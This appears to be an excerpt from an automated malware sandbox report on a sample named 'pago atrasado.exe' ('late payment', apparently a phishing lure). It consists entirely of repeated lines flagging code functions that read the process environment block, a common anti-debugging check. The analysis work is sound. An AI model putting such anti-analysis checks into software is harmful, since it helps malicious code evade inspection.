          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]
